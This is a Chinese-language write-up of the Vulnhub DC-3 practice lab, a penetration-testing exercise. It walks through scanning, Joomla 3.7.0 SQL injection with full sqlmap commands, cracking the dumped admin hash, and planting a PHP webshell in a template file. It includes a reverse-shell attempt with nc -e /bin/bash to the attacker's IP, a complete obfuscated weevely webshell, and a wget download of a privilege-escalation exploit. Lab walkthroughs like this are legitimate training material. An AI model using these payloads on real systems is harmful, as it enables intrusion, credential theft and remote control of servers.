Vulnhub靶场DC-3

本机192.168.223.128 靶机192.168.223.139 目标发现nmap -sP 192.168.223.0/24

端口扫描nmap -p- 192.168.223.139

之开启了一个80端口 看一下是什么服务

nmap -sV -p- -A 192.168.223.139

是一个apache服务，joomla模板 看一下web

没什么有用信息。 扫描一下后台

dirsearch -u http://192.168.223.139/

有个administator可能是后台界面 看一下

joomla这个cms有个专门漏扫工具 joomscan --help

扫一下

没扫出来什么有用的信息 比较重要的就是这个版本3.7.0，搜一下看看有没有漏洞

看一下这个php文件 把里面的url改成目标机ip

不太管用，换个txt文件看看怎么个回事

看看这42033.txt，版本号完全一致

给了sqlmap的指令，把其中的url改一下

sqlmap -u "http://192.168.223.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

爆出库名了 看一下当前库名

当前是joomladb 看一下表明

sqlmap -u "http://192.168.223.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --tables -D joomladb -p list[fullordering]

巨长的表，一般看users

sqlmap -u "http://192.168.223.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -T "#__users" -D joomladb -p list[fullordering] --columns

注意给表名加上双引号不然会被当成注释

这里字典就使用1

有账号密码

sqlmap -u "http://192.168.223.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dump -C username,password -T "#__users" -D joomladb -p list[fullordering]

admin $2y 10 10 10DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu john爆破一下密码

密码是snoopy

登上了

这里可以文件读取也可以文件上传 发现有个php文件，修改成一句话

注意目录是/templates/beez3/html/modules.php 成功rce 现在可以反弹shell 攻击机开个监听端口 nc -lvnp 4567 x=system(“nc -e /bin/bash 192.168.223.128 4567”); 发现弹不过来，不知道什么问题。。。（后来发现是靶机的nc 没有-e功能）

换个方法，用kali自带的传马工具weevely 先生成在一个马 weevely generate x /tmp/shell.php 把里面的内容复制到刚才那个modules.php里面

<?php $K='$k="9dd4XAe461";$XAXAkhXA="268c8XA034f5c8XA";$kf="564e15XAXA5c67a6";$XAp="6obiXAXAcjYP3y0JgHXApI";funct'; $X=str_replace('B','','BcBrBeateB_fBBunction'); $c='XAioXAn x($t,$k){XA$c=stXArlXAen(XAXA$k);$l=strlen($tXA);$o="";fXAXAor($XAi=0;$i<$l;){for(XA$j=0;('; $H='"XA/$khXA(.+)$XAkfXA/",XA@file_get_contentXAsXA("php://input"XAXA),$m)==1)XA {@ob_sXAtart()XA;@evX'; $n='Aal(@gzXAuncompreXAss(@XAx(@base6XA4_decode(XA$mXA[1XA]XA),$k)));$o=@ob_geXAt_conXAtentXAs();@ob_e'; $W='XAnXAd_clean();XA$r=@baseXA6XAXA4_encode(@x(@gzcomXApressXA($o),XAXAXA$k));priXAnt("$p$kh$r$kf");}'; $C='XAXA$j<$cXA&&$i<XA$lXA);$j++,$i++){$XAo.=$tXA{$i}^$XAk{XA$j};}}retuXAXArn $o;}iXAf (@preg_matchXA('; $r=str_replace('XA','',$K.$c.$C.$H.$n.$W); $i=$X('',$r);$i(); ?>

然后连接 weevely http://192.168.223.139/templates/beez3/html/modules.php x

成功弹回shell

翻了一圈没找到可以利用的文件，看了别人的wp发现是Ubuntu这个版本有漏洞 lsb_release -a看一下自己的Ubuntu版本

搜一下版本漏洞

看其他人使用这个漏洞，看一下

下载一下exp

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

最后老失败，不知道为什么，晕，基本完成了…